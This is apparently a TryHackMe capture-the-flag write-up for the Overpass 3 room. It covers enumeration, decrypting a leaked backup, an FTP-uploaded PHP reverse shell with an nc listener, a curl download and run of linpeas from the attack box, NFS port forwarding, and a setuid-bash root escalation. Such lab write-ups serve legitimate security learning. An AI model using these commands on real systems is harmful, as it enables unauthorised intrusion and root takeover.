Link to room on TryHackMe.com

Welcome to my TryHackMe-Overpass3-Hosting-WriteUp! first we start enumeration with rustscan with this command:

rustscan -a 10.10.70.140 -- -sC -sV
Image 1

we see three ports are open and there is no useful exploit for this versions of services. So we keep enumerating with gobuster and use this command:

gobuster dir -u http://10.10.70.140/ -w common.txt -x php,html,md,js,txt
Image 2

so we see there is a directory called /backups. when we check it we see there is a file called backup.zip and inside of it there is a private key and a encrypted file

Image 3

to decrypt file we use these commands:

unzip backup.zip
gpg --import priv.key
gpg --decrypt-file CustomerDetails.xlsx.gpg

after that in original file we find some credentials:

Image 4

when we try to login ftp with user paradox we see we can login and we can upload file. with this vulnerabilty we can get a reverse shell. you can find reverse shell in here https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php . so first we upload our .php file after that we start a listener on our attackbox with this command:

nc -lvnp 443

when we visit /shell1.php in browser we have a reverse shell:

Image 5
Image 6

Wee see we are in as user apache. After that we login as user paradox. For to get some information about the system we upload linpeas.sh to the system you can find it in here: https://github.com/peass-ng/PEASS-ng/releases/download/20240421-825f642d/linpeas.sh . To upload this script first we start a simple http server in our attackbox with this command:

python3 -m http.server 7000

after that in target we use these commands:

cd /dev/shm
curl http://10.17.52.17:7000/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Image 7

So linpeas says there is a nfs share. After some research i found out that we need a private ssh key and nfs share is only accessible locally. First we generate a ssh key then paste it to /home/paradox/.ssh/authorized_keys

Image 8

After that we run this commands on our attackerbox for port forwarding:

chmod 600 sshkey
ssh -L 2049:localhost:2049 paradox@10.10.70.140 -i sshkey

after that we mount the share with these commands:

mkdir nfs
mount -t nfs 127.0.0.1: nfs

and then we see there is second flag and private key of james.

Image 9

then we see private key has no password and we can login as user james

Image 10

for to find our first flag we use this command:

find / -type f -name "*flag*" -exec ls -l {} + 2>/dev/null

to be root we use nfs missconfiguration. first in target we use this command:

cp /usr/bin/bash /home/james

after that in our attackbox we go to mounted directory and use these commands: 

chown root:root bash
chmod +s bash

then when we look at bash binary in target it should look like this for to execute

Image 11

and finally we use this command to be root:

./bash -p
Image 12

and done. We are root. Thanks for reading!